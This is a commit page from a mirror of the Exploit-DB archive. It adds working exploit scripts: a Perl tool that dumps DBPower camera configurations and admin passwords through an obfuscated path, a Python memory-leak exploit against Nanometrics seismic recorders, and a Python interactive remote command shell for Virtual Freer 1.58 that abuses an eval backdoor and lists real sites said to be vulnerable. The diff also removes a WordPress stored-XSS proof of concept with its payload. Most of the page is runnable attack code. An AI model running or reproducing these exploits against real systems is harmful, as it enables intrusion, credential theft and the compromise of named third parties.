bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-02-20

Browse source 
5 changes to exploits/shellcodes

WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting
Virtual Freer 1.58 - Remote Command Execution
DBPower C300 HD Camera - Remote Configuration Disclosure
Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak
This commit is contained in:
Offensive Security 2020-02-20 05:01:53 +00:00
parent e28fa0b839
commit 16b45536b7
5 changed files with 412 additions and 32 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

89
exploits/hardware/webapps/48095.pl Executable file
View file

@ -0,0 +1,89 @@
# Exploit Title: DBPower C300 HD Camera - Remote Configuration Disclosure
# Date: 2020-02-19
# Author: Todor Donev
# Vendor: https://donev.eu/
# CVE: N/A
# Copyright 2020 (c) Todor Donev
#
# https://donev.eu/
# https://donev.eu/blog/dbpower-c300-multiple-vulnerabilities
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
#
# [ DBPower C300 HD Camera Remote Configuration Disclosure
# [ ==========================================================
# [ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com>
# [ Initializing the browser
# [ >> User-Agent => Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112
# [ >> Content-Type => application/x-www-form-urlencoded
# [ << Connection => close
# [ << Date =>
# [ << Accept-Ranges => bytes
# [ << Server => thttpd/2.25b 29dec2003
# [ << Content-Length => 25730
# [ << Content-Type => application/octet-stream
# [ << Last-Modified =>
# [ << Client-Date =>
# [ << Client-Peer => 192.168.1.103:8080
# [ << Client-Response-Num => 1
# [
# [ Username : admin
# [ Password : admin
#
#!/usr/bin/perl
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster 'gunzip';
my $host = shift || ''; # Full path url to the store
my $cmd = shift || ''; # show - Show configuration dump
$host =~ s/\/$//;
print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0
print "[ DBPower C300 HD Camera Remote Configuration Disclosure\n";
print "[ ==========================================================\n";
print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";
if ($host !~ m/^http/){
print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
exit;
}
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
# my $target = $host."/tmpfs/config_backup.bin";
my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
my $gzipped = $response->content();
my $config = gunzip($gzipped);
print "[ \n";
if ($cmd =~ /show/) {
print "[ >> Configuration dump...\n[\n";
print "[ ", $_, "\n" for split(/\n/,$config);
exit;
} else {
print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
exit;
}

207
exploits/hardware/webapps/48098.py Executable file
View file

@ -0,0 +1,207 @@
# Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak
# Date: 2020-02-15
# Author: byteGoblin
# Vendor: https://www.nanometrics.ca
# Product: https://www.nanometrics.ca/products/accelerometers/titan-sma
# Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder
# CVE: N/A
#
# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit
#
#
# Vendor: Nanometrics Inc.
# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma
# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder
#
# Affected versions:
# Centaur <= 4.3.23
# TitanSMA <= 4.2.20
#
# Summary:
# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists
# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities.
# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and
# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for
# infrasound and similar geophysical sensor recording applications requiring sample rates up to
# 5000 sps.
#
# Summary:
# The TitanSMA is a strong motion accelerograph designed for high precision observational and
# structural engineering applications, where scientists and engineers require exceptional dynamic
# range over a wide frequency band.
#
# Description:
# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect
# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT)
# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224.
# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage.
# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP
# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system
# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent
# packet) which can be combined to leak sensitive data which can be used to perform session hijacking
# and authentication bypass scenarios.
#
# Tested on:
# Jetty 9.4.z-SNAPSHOT
#
# Vulnerability discovered by:
# byteGoblin @ zeroscience.mk
#
#
# Advisory ID: ZSL-2020-5562
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php
#
# Related CVE: CVE-2015-2080
# Related CWE: CWE-532, CWE-538
#
# 10.02.2020
#
#!/usr/bin/env python3
import requests
import re
import sys
class Goblin:
def __init__(self):
self.host = None
self.page = "/zsl"
self.syslog = "/logs/syslog"
self.buffer_pad = "A" * 70
self.buffer = None
self.payload = "\xFF"
self.payloads_to_send = 70 # 70 seems to be a good number before we get weird results
self.body = {}
self.headers = None
self.syslog_data = {}
self.last_line = None
self.before_last_line = True
def banner(self):
goblin = """
NN
NkllON
0;;::k000XN KxllokN
0;,:,;;;;:ldK Kdccc::oK
Nx,';codddl:::dkdc:c:;lON
klc:clloooooooc,.':lc;'lX
x;:ooololccllc:,:ll:,:xX
Kd:cllc'..';:ccclc,.x _ . ___ _ .
NOoc::c:,'';:ccllc::''k \ ___ , . _/_ ___ .' \ __. \ ___ | ` , __
Nklc:clccc;.;odoollc:',xN |/ \ | ` | .' ` | .' \ |/ \ | | |' `.
0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | |
0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \__/ `.___, `.___| `._.' `___,' /\__ / / |
Nc'clc;..,,,:::c:;;;,'..:oddoc;c0 \___/
Nl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed//
XxclkXk;'::,,,''';:::;'''...'',:o0
Kl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin
O,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk
Kdcccccdl'';;..'::;;,,,;:::;,'..;:.;K
d;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca
Oddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA
d...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20
0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK
0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A
0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php
:,;okxdc,..,,..lK Xkol;:x0kl;;::;':0
x:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product
Xx:,'':xk:..,''lK Y k;';;';xX
XOkkko'.....'O d.';;,,:xN
0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._
XOkkkkkON
"""
print(goblin)
def generate_payload(self, amount_of_bytes):
self.payload += "\x00" * amount_of_bytes
self.headers = {"Cookie": self.buffer_pad, "Referer": self.payload}
def read_syslog(self, initial=False):
# Read syslog remotely and filter out 'HeapByteBuffer' messages.
# 'initial' is used to make a 'snapshot' of the state before we send payloads...
# That way we can filter on what we've just sent.
print("[!] - Grabbing syslog from: {}{}".format(self.host, self.syslog))
buffer = ""
r = requests.get(self.host + self.syslog)
if r.status_code == 200:
print("[!] - We got syslog, it is: {} bytes".format(len(r.content)))
split = r.text.split("\n")
for line in split:
if "HeapByteBuffer" in line:
if initial:
self.last_line = line
else:
if line == self.last_line:
self.before_last_line = False
if not self.before_last_line:
buffer_addr = re.search("\@\w+", line).group(0).strip("@")
try:
leak = re.search(">>>.+(?=\.\.\.)", line).group(0).strip(">>>")
buffer += leak
except Exception as e:
print(e)
if initial:
return self.last_line
self.buffer = buffer
else: # we can't access syslog?
print("[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...")
print("[!!!] - The status code we got was: {}".format(r.status_code))
exit(-1)
def show_output(self):
# we need to translate '\r\n' into actual newlines
if self.buffer is not None and self.buffer is not "":
self.buffer = self.buffer.replace("\\n", "\n")
self.buffer = self.buffer.replace("\\r", "\r")
self.buffer = self.buffer.replace("%2f", "/")
print("[*] BUFFER LENGTH: {}".format(len(self.buffer)))
print("=" * 50)
print("[*] THIS IS THE LOOT")
print("=" * 50)
for num, x in enumerate(self.buffer.split("\n")):
print("{}.\t| \t{}".format(num, x))
def send_payload(self, amount):
print("[!] - Sending payloads to target: {}{}".format(self.host, self.page))
if amount > self.payloads_to_send or amount < 0:
amount = self.payloads_to_send
for num, x in enumerate(range(0, amount)):
if num % 10 == 0:
print("[!] - [{}/{}] payloads sent...".format(num, amount))
try:
self.generate_payload(17)
r = requests.post(self.host + self.page, data=self.body, headers=self.headers)
except Exception as e:
print(e)
print("[!] - [{}/{}] payloads sent...".format(amount, amount))
def parse_sys_args(self):
if len(sys.argv) >= 2:
self.host = sys.argv[1]
if not "http" in self.host:
self.host = "http://{}".format(self.host)
if len(sys.argv) == 3:
# amount of packets to send
self.payloads_to_send = sys.argv[2]
else:
self.print_help()
def print_help(self):
print("Usage: {} <ip_addr[:port]> [amount of payloads to send]".format(sys.argv[0]))
print("Example: centaur3.py 123.456.789.0:8080 200")
print("\tThis will send 200 payloads to the aforementioned host")
print("\tThe [port] and [amount of payloads] are optional")
exit(-1)
def main(self):
self.parse_sys_args()
self.banner()
ll = self.read_syslog(initial=True)
self.send_payload(70)
self.read_syslog()
self.show_output()
if __name__ == '__main__':
Goblin().main()

31
exploits/php/webapps/48093.txt
View file

@ -1,31 +0,0 @@
# Exploit Title: WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting
# Dork:N/A
# Date: 2020-02-17
# Exploit Author: UltraSecurityTeam
# Team Member = Ashkan Moghaddas , AmirMohammad Safari , Behzad khalife , Milad Ranjbar
# Vendor Homepage: UltraSec.Org
# Software Link: https://downloads.wordpress.org/plugin/wp-sitemap-page.zip
# Tested on: Windows/Linux
# Version: 1.6.2
.:: Plugin Description ::.
An easy way to add a sitemap on one of your pages becomes reality thanks to this WordPress plugin. Just use the shortcode [wp_sitemap_page] on any of your pages. This will automatically generate a sitemap of all your pages and posts
.:: Proof Of Concept (PoC) ::.
Step 1 - Open WordPress Setting
Step 2 - Open Wp Sitemap Page
Step 3 - Inject Your Java Script Codes to Exclude pages
Step 4 - Click Button Save Changes
Step 5 - Run Your Payload
.:: Tested Payload ::.
'>"><script>alert(/XSS By UltraSecurity/)</script>
.:: Post Request ::.
option_page=wp-sitemap-page&action=update&_wpnonce=de5e7c2417&_wp_http_referer=%2Fwp%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp_sitemap_page%26settings-updated%3Dtrue&wsp_posts_by_category=&wsp_exclude_pages=%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS+By+UltraSecurity%2F%29%3C%2Fscript%3E&wsp_exclude_cpt_archive=1&wsp_exclude_cpt_author=1&submit=Save+Changes

113
exploits/php/webapps/48094.py Executable file
View file

@ -0,0 +1,113 @@
# Exploit title : Virtual Freer 1.58 - Remote Command Execution
# Exploit Author : SajjadBnd
# Date : 2020-02-17
# Vendor Homepage : http://freer.ir/virtual/
# Software Link : http://www.freer.ir/virtual/download.php?action=get
# Software Link(mirror) : http://dl.nuller.ir/virtual_freer_v1.58[NuLLeR.iR].zip
# Tested on : Ubuntu 19.10
# Version : 1.58
############################
# [ DESCRIPTION ]
#
# Free Script For Sell Charging Cards and Virtual Products
#
# [POC]
#
# Vulnerable file: /include/libs/nusoap.php
# 943: eval($_POST['a74ad8dfacd4f985eb3977517615ce25']);
#
# POST /include/libs/nusoap.php
# payload : a74ad8dfacd4f985eb3977517615ce25=system('uname -a');
#
# [ Sample Vulnerable Sites ]
#
# http://3cure.ir/buy/
# http://cheapcharger.ir/
# http://www.appraworld.ir/
# http://latoon.ir/
# http://novinv.ir/
#
import requests
import os
import sys
def clear():
linux = 'clear'
windows = 'cls'
os.system([linux, windows][os.name == 'nt'])
def Banner():
print '''
#################################################
# #
# Virtual Freer 1.58 - Remote Command Execution #
# SajjadBnd #
# BiskooitPedar #
# blackwolf@post.com #
#################################################
'''
def inputs():
target = raw_input('[*] URL : ')
while True:
try:
r = requests.get(target,verify=False)
start(target)
except requests.exceptions.MissingSchema:
target = "http://" + target
def start(target):
print "======================\n\n[!] Checking: ****()"
url = '%s/include/libs/nusoap.php' % (target)
body = {'a74ad8dfacd4f985eb3977517615ce25':'echo vulnerable;'}
r = requests.post(url,data=body,allow_redirects=False,timeout=50)
content = r.text.encode('utf-8')
if 'vulnerable' in content:
print "[+] vulnerable: ****()\n"
else:
print "[-] Target not Vulnerable!"
sys.exit(1)
print "\n[!] Checking: System()"
body = {'a74ad8dfacd4f985eb3977517615ce25':'system(id);'}
r = requests.post(url,data=body,allow_redirects=False,timeout=50)
content = r.text.decode('utf-8')
if 'gid' in content:
print "[+] vulnerable: system()\n"
osshell(url)
else:
print "[-] Target not Vulnerable to Running OS Commands!"
evalshell(url)
def osshell(url):
print "======================\n[+] You can run os commands :D\n"
while True:
try:
cmd = raw_input('OS_SHELL $ ')
command = "system('%s');" % (cmd)
body = {'a74ad8dfacd4f985eb3977517615ce25':command}
r = requests.post(url,data=body,allow_redirects=False,timeout=50)
content = r.text.encode('utf-8')
print "\n",content
except KeyboardInterrupt:
print "\n____________________\n[+] GoodBye :D"
sys.exit(1)
def evalshell(url):
print "======================\n[+] You can just run Eval Commands :D\n"
while True:
try:
cmd = raw_input('\nEval()=> ')
command = '%s;' % (cmd)
body = {'a74ad8dfacd4f985eb3977517615ce25':command}
r = requests.post(url,data=body,allow_redirects=False,timeout=50)
content = r.text.encode('utf-8')
print "\n",content
except KeyboardInterrupt:
print "\n____________________\n[+] ok! GoodBye :D"
sys.exit(1)
if __name__ == '__main__':
clear()
Banner()
inputs()

4
files_exploits.csv
View file

@ -42373,4 +42373,6 @@ id,file,description,date,author,type,platform,port
48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php, 48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,
48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php, 48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,
48090,exploits/java/webapps/48090.py,"LabVantage 8.3 - Information Disclosure",2020-02-17,"Joel Aviad Ossi",webapps,java, 48090,exploits/java/webapps/48090.py,"LabVantage 8.3 - Information Disclosure",2020-02-17,"Joel Aviad Ossi",webapps,java,
48093,exploits/php/webapps/48093.txt,"WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting",2020-02-18,"Ultra Security Team",webapps,php, 48094,exploits/php/webapps/48094.py,"Virtual Freer 1.58 - Remote Command Execution",2020-02-19,SajjadBnd,webapps,php,
48095,exploits/hardware/webapps/48095.pl,"DBPower C300 HD Camera - Remote Configuration Disclosure",2020-02-19,"Todor Donev",webapps,hardware,
48098,exploits/hardware/webapps/48098.py,"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak",2020-02-19,byteGoblin,webapps,hardware,

Can't render this file because it is too large.